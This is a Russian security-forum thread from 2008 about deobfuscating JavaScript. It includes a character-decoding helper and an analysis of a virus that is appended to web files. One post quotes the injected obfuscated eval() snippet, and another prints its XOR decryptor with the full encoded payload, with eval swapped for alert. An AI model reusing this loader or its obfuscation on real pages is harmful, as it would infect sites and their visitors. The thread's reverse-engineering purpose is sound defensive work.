Расшифровка Js

Discussion in 'PHP' started by [х26]VОLАND, 11 Feb 2008.

  1. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Пожалуйста расшифруйте JS-скрипт http://www.voland-lab.com/js.txt
    Он же eCardMax HotEditor. Если у кого есть, поделитесь.
     
    1 person likes this.
  2. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Помогите купить квартиру :)
     
    2 people like this.
  3. AHTOLLlKA

    AHTOLLlKA Member

    Joined:
    1 Feb 2005
    Messages:
    225
    Likes Received:
    35
    Reputations:
    22
    это исис так с темы съехал.. не смог расшифровать видемо =)))
     
    3 people like this.
  4. AHTOLLlKA

    AHTOLLlKA Member

    Joined:
    1 Feb 2005
    Messages:
    225
    Likes Received:
    35
    Reputations:
    22
    интересно все зашкерено, ТС ты знаешь что код то делает хотяб ?
     
  5. AHTOLLlKA

    AHTOLLlKA Member

    Joined:
    1 Feb 2005
    Messages:
    225
    Likes Received:
    35
    Reputations:
    22
    блин, я имею ввиду код по ссылке из первого поста, что там закодировано ты знаешь ?
     
  6. Midas

    Midas Elder - Старейшина

    Joined:
    17 Jan 2008
    Messages:
    241
    Likes Received:
    45
    Reputations:
    1
    улыбнуло :) Исис +1. Жжоте :)

    [x26]VOLAND, юзай энтер )))
     
    #6 Midas, 13 Feb 2008
    Last edited: 13 Feb 2008
  7. Midas

    Midas Elder - Старейшина

    Joined:
    17 Jan 2008
    Messages:
    241
    Likes Received:
    45
    Reputations:
    1
    обьясняю. Он не зашифрован ничем, его ненадо расшифровывать. И вобще я не слышал, чтобы JavaScript шифровали.. он же работать не будет.

    Просто немножко павтыкай в код, сделав его немного красивее. Возьми шнягу какую-нибудь, которая подсвечивает скобки и прочую гадость. NotePad++ к примеру.
     
  8. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    [x26]VOLAND,
    http://dump.ru/files/o/o2544149176/
    пасс "_antichat.ru"

    Midas, ну-ну.
     
  9. Midas

    Midas Elder - Старейшина

    Joined:
    17 Jan 2008
    Messages:
    241
    Likes Received:
    45
    Reputations:
    1
    ок, обоснуйте мне что я не прав. Если это так, спотить не стану.
     
  10. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    Code:
    Просто немножко павтыкай в код, сделав его немного красивее. Возьми шнягу какую-нибудь, которая подсвечивает скобки и прочую гадость. NotePad++ к примеру.
    Если [x26]VOLAND попросил помочь, значит он считает, что пока недостаточно уверенно ориентируется в JS чтобы сделать это самостоятельно.
    Стоит ли советовать ему "немного повтыкать в код, сделав его красивее"?
    P.S. Сравни исходный файл (последний кусок обфусцирован) и результат.
     
    #10 astrologer, 13 Feb 2008
    Last edited: 13 Feb 2008
  11. Midas

    Midas Elder - Старейшина

    Joined:
    17 Jan 2008
    Messages:
    241
    Likes Received:
    45
    Reputations:
    1
    ого. Честно говоря для меня теперь загадка, каким ху.. образом браузер это интерпретирует 0_о
     
  12. Midas

    Midas Elder - Старейшина

    Joined:
    17 Jan 2008
    Messages:
    241
    Likes Received:
    45
    Reputations:
    1
    Пасип, суть понял, прочитав описание метода eval()

    Ну не кодер я:) Пробовал, знаком, кое чего даже могу, но не кодер..увы
     
  13. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    http://dump.ru/files/o/o601039227/
    пасс тот же

    Приводится в читаемый вид довольно просто (не сложно догадаться, что я использовал textarea, а там был закрывающий тэг), тем более, что используется всем известный пакер.

    P.S. иногда бывает полезно переписать стандартные функции, чтобы не заменять в коде каждый их вызов,например так:
    Code:
    eval = function(s)
    {
      alert(s);
    }
    Конечно, это нужно делать до запуска исследуемого скрипта.
    P.P.S А чтобы было сложно разобраться в коде, не "шифруйте" скрипты за счёт работы со строками и всяких преобразований - это бессмысленно.
    Используйте прототипирование. Очень полезно.
    И сразу становится проще самому написать.
     
    1 person likes this.
  14. dx4r

    dx4r New Member

    Joined:
    13 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Пожалуйста расшифруйте JS-скрипт

    http://dump.ru/file_catalog/958568
     
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    dx4r,

    Code:
    <script type="text/javascript">
    function decodetest(){
    //get the input
      var t = document.getElementById('dectest').value;
    //remove carriage returns
      t = t.replace(new RegExp("\\=\r\n","gim"), "");
    //replace urlencoded values
      t = unescape(t);
    //replacement values
      var thechrs = new Array(
        ' ','!','"','#','$','%','&',"'",'(',')','*','+',',','-','.','/','0','1','2','3',
        '4','5','6','7','8','9',':',';','<','=','>','?','@','A','B','C','D','E','F','G', 
        'H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','[', 
        '\\',']','^','_','`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
        'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',' ','c','u','e','a',
        'a','a','a','c','e','e','e','i','i','i','a','a','e','ae','ae','o','o','o','u','u',
        'y','u','u','o','l','0','x','f','a','i','o','u','n','n','*','O','?','r','_','?',
        '?','!','<','>','_','_','_','|','|','a','a','a','c','|','|','+','+','c','y','+',
        '+','-','-','+','-','+','a','a','+','+','-','-','|','-','+','.','.','d','e','e',
        'e','i','i','i','i','+','+','_','_','|','i','_','o','o','o','o','o','o','u','p',
        'p','u','u','u','y','y','_',"'",'-','?','_','?','?','S','÷','¸','°','¨','·','¹',
        '³','²','_',' ');
    //replace js numeric array values
      var l = 32;
      for (l = 32; l < 256; l++){
        t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ",");
        t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ",");
      }
      for (l = 32; l < 256; l++){
        t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]");
        t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]");
      }
      for (l = 32; l < 256; l++){
        t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ",");
        t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ",");
      }
      ta = t;
      t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2");
      while(ta !== t){
        ta = t;
        t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2");
      }
    //replace entities
      var l = 32;
      for (l = 32; l < 100; l++){
        t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]);
        t = t.replace(new RegExp("&#0" + l + ";","gim"),thechrs[l-32]);
        t = t.replace(new RegExp("&#00" + l + ";","gim"),thechrs[l-32]);
      }
      var l = 100;
      for (l = 100; l < 256; l++){
        t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]);
        t = t.replace(new RegExp("&#0" + l + ";","gim"),thechrs[l-32]);
      }
    //return results
      document.getElementById("parsed").innerHTML = t;
    }
    </script>
     
  16. dx4r

    dx4r New Member

    Joined:
    13 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    n0ne, а как вы ево расшифровали, и почему он в таком виде не работает?
     
  17. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    А кто вот этот вирусок расшифрует? Прикрепляется в конец файла ****
    Вот как он выглядит (вырезал середину):
    HTML:
    <!-- [ 4455e927ffa4408f4d13cbdc18c9a79d ] --><script>eval('\x66\x75\x6e\x63\x74\x69\x6f\ ... x37\x64\x27\x29\x3b');</script><!-- end -->
    http://ifolder.ru/7042045
    http://rapidshare.com/files/123665937/virus_help_.rar
    http://depositfiles.com/files/6091668
     
  18. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Замени eval на alert
    Code:
    function wFh (gBZfU) {
      function aVET (uEeYZ) {
        var wzflAe = 0;
        var huL = uEeYZ.length;
        var eEUIOL = 0;
        while (eEUIOL < huL) {
          wzflAe += gIsqvl (uEeYZ, eEUIOL) * huL;
          eEUIOL++;
        }
        return (wzflAe + '');
      }
    
      function gIsqvl (nOI, ierOXSV) {
        return nOI.charCodeAt (ierOXSV);
      }
    
      try {
        var jGMOy = eval ('aDrzgouzmoefnDtfso.fcfaDlolzebeo'.replace (/[fzoDb]/g, ''));
        var whT = new String ();
        var gDI = 0;
        yQyUmy = 0, vTkBMe = (new String(jGMOy)).replace(/[^@a-z0-9A-Z_.,-]/g,'');
        var tDGIej = aVET (vTkBMe);
        gBZfU = unescape (gBZfU);
        for (var mGtHBvkh = 0; mGtHBvkh < (gBZfU.length); mGtHBvkh++){
          var hFgH = gIsqvl (vTkBMe,gDI) ^ gIsqvl (tDGIej, yQyUmy);
          var qKpcSA = gIsqvl (gBZfU, mGtHBvkh);
          yQyUmy++;
          gDI++;
          if (yQyUmy > tDGIej.length)
            yQyUmy = 0;
          if (gDI > vTkBMe.length)
            gDI = 0;
          whT += String.fromCharCode (qKpcSA ^ hFgH);
        }
        alert (escape(whT)); //добавлено мной
        //eval(whT);  // закоментировано тоже мной :)
        return whT = new String();
      } catch (e){}
    }
    wFh ('%33%33%36%37%36%33%36%32%57%3b%09%79%5c%17%28%58%1a%27%73%20%30%31%2d%32%23%1d%35%02%66%4e%72%14%0e%25%27%34%36%28%3d%3e%22%04%4a%64%5b%61%3d%36%15%20%02%3a%04%34%35%76%28%2f%30%35%7e%20%0d%29%6b%17%0d%1c%09%17%67%19%2f%74%36%3d%30%17%17%12%20%11%75%2b%14%32%3d%6b%7e%33%33%20%0a%36%29%65%78%2f%31%22%1a%4e%30%74%4c%4c%54%68%54%73%6b%1f%3f%1e%43%46%72%5f%66%74%63%3f%3d%78%21%16%3d%7f%4a%6f%70%61%2d%3f%10%3f%3a%31%3e%1a%24%60%6d%4c%62%5c%0b%73%36%25%6a%1a%3d%14%37%25%3c%26%15%30%2e%07%12%1d%30%7d%7e%68%64%56%48%7e%76%5c%63%3b%3a%2c%53%2a%05%15%2e%24%2c%20%77%68%45%2f%20%18%63%29%75%7a%67%4f%5a%1c%63%7c%7e%68%6b%76%41%24%30%28%1f%23%36%20%7d%06%7a%0c%7e%7d%5d%73%7e%70%5d%7f%71%73%73%38%63%7d%60%4c%79%70%27%39%25%2f%5c%37%02%6b%17%36%2b%25%08%16%2e%0c%2a%07%6a%6c%7f%76%71%66%4f%63%74%59%5e%72%22%0e%38%7b%36%25%75%6f%60%4c%7d%04%25%3f%2e%7d%30%04%33%2c%60%13%78%3e%14%0e%2b%2b%76%24%36%37%2d%3e%3a%34%53%6d%3f%1c%76%70%6c%02%72%06%07%34%05%65%22%7b%33%77%2d%7f%47%71%56%35%61%71%50%06%53%1d%66%01%42%0b%66%08%44%35%62%7d%71%04%6b%34%6c%0b%27%0e%05%01%0a%09%06%75%39%6c%22%44%66%70%03%26%0e%1d%21%3a%0d%2b%71%2a%1a%38%01%1c%71%4d%09%5e%0b%7d%43%3a%7d%7e%42%3b%7a%79%7d%4a%21%11%02%5e%2e%3a%32%76%2d%66%40%6e%21%68%16%7e%2f%6b%74%69%09%40%4c%1d%7d%68%24%15%0c%21%3b%68%0f%21%2f%2a%59%17%17%0a%36%6d%67%2b%2e%12%33%65%04%33%2f%23%13%2b%78%4c%59%04%54%2c%22%2f%3d%20%1c%41%4a%57%33%6a%59%79%09%11%30%1e%29%24%47%21%58%23%63%34%28%08%3f%31%2a%1e%03%0d%2c%0d%26%1b%1d%1b%37%79%22%7e%03%28%3a%21%2b%26%0d%21%4f%44%31%71%3a%25%24%05%11%64%75%70%15%14%31%6d%32%36%32%13%69%38%3e%1c%14%6a%24%74%3d%0e%23%21%26%17%32%30%20%1a%35%2d%5b%3c%38%2e%1e%34%01%18%23%10%22%75%4b%57%7d%7b%73%5b%78%61%23%37%28%29%7a%22%39%2d%29%2d%38%17%3b%38%28%33%68%44%7f%7c%7f%71%56%79%69%3f%78%36%39%45%20%4f%7a%31%03%26%6c%3c%23%47%41%7a%58%0f%10%0d%29%64%72%11%22%2a%35%38%34%00%5b%49%2e%2a%7f%33%11%01%67%26%18%55%32%73%57%75%21%6c%7b%29%06%35%0b%22%1e%3f%4a%56%3c%0a%23%33%32%37%37%2a%39%68%4c%0d%0f%19%50%5b%77%29%33%1a%71%37%3f%00%06%1b%1d%07%21%28%0c%35%2c%3c%33%12%33%4f%53%69%3c%37%3b%34%53%24%64%4b%23%0b%16%0b%13%5d%08%00%66%5c%20%1a%17%59%00%16%1e%3e%22%1b%78%17%18%6b%0c%08%51%3f%73%31%30%20%2a%37%37%3c%3c%06%0b%7d%66%34%34%20%5e%71%7c%37%67%20%49%09%68%19%6a%0d%2b%1c%3b%7b%0f%6a%7c%74%33%0e%21%53%79%0e%16%56%35%07%31%0b%41%06%3d%71%2f%63%61%33%32%31%30%14%2e%19%62%7c%1a%3f%07%18%2a%56%6a%09%76%25%60%7e%7e%70%4f%76%03%2a%38%36%72%7f%31%17%13%20%13%36%3c%0a%1e%1b%4a%7f%77%3a%19%74%07%64%64%5f%78%7a%18%31%5c%37%05%6c%32%33%05%2c%60%07%19%6d%6b%6f%03%6e%71%3d%66%2c%68%36%49%49%2e%24%60%15%2f%13%33%18%60%7a%68%4c%06%25%27%79%2a%0a%7b%52%1e%6b%3d%74%75%4d%53%57%42%3a%6a%38%73%39%1a%33%22%73%18%6a%7a%23%61%58%67%17%75%19%52%72%34%70%17%7a%2b%7f%6c%79%18%5f%0c%17%30%26%05%5a%11%6c%59%36%6c%1d%3a%3e%06%09%7d%4a%7c%13%35%21%21%35%2e%7e%34%59%21%31%09%33%2d%29%20%39%34%43%03%35%17%01%25%70%79%3e%04%1c%69%0a%1c%2d%26%32%7b%7c%2a%69%20%7b%74%39%1b%31%0a%22%1d%4f%6d%59%5f%32%3c%18%29%33%27%3a%58%7b%25%2b%15%6e%01%27%32%1d%48%3a%5c%6d%71%38%78%58%0c%7f%58%7d%01%6a%7c%20%05%1e%0a%37%13%55%14%5c%11%5e%78%65%63%3b%39%36%26%2b%0a%09%51%6f%0b%54%6c%37%3f%20%18%08%33%02%04%71%2f%09%0f%28%1b%2b%79%24%4d%2d%4f%7a%68%73%5b%52%14%21%22%0e%3d%4d%2d%2a%32%07%1b%15%38%34%7d%77%27%34%0e%34%75%2c%09%20%0d%32%2e%7e%3b%38%34%5f%5f%31%0a%30%31%50%35%77%34%38%34%34%10%09%38%02%1a%2e%7a%26%1f%4d%07%24%2e%1b%3f%77%3e%2d%38%4d%4a%7b%31%30%1b%3f%26%3e%1e%16%6b%3b%05%1a%3e%5c%75%3e%37%29%22%3e%68%20%14%21%17%67%22%79%79%2f%3e%15%7c%21%25%14%27%6d%76%66%71%35%4f%34%35%2a%06%5f%38%26%74%0d%22%2d%79%1d%20%01%3b%7d%6b%47%32%06%25%17%34%38%23%41%75%7d%7c%41%4b%51%77%47%55%5a%59%70%7f%7f%64%28%3b%0f%07%3b%63%2f%23%6f%3d%28%23%2d%1f%36%4e%51%3d%34%36%03%31%67%75%61%75%7c%71%57%7e%5a%19%09%64%20%2b%3a%76%13%37%1a%16%1b%50%54%7c%7c%6c%21%31%20%32%05%33%22%46%51%69%21%74%36%1c%11%22%3c%7f%22%04%0a%10%1e%57%77%7c%6c%2b%5a%00%11%16%14%2d%32%3a%27%2c%3d%7a%6b%36%3c%17%04%30%2e%3f%36%65%76%3a%33%08%11%29%22%17%3b%31%0c%1e%16%6b%7a%34%19%1a%08%5a%67%4a%25%2f%3e%31%37%0f%0b%32%00%35%7d%63%09%62%21%32%01%54%35%35%2c%17%53%0e%05%31%52%04%17%7f%6c%67%1b%18%15%16%78%2c%39%28%23%16%28%24%4f%75%7d');</script>
    
     
    #18 krypt3r, 22 Jul 2008
    Last edited: 22 Jul 2008
    1 person likes this.
  19. Naydav

    Naydav Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    439
    Likes Received:
    63
    Reputations:
    4
    Такой вопрос...
    h_ttp://www.bananascript.com/index.php?compress

    ведь его тоже можно для "шифровки" использовать?
     
  20. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Ничего себе археологи... какую темку откопали...
    Свою создать было не судьба?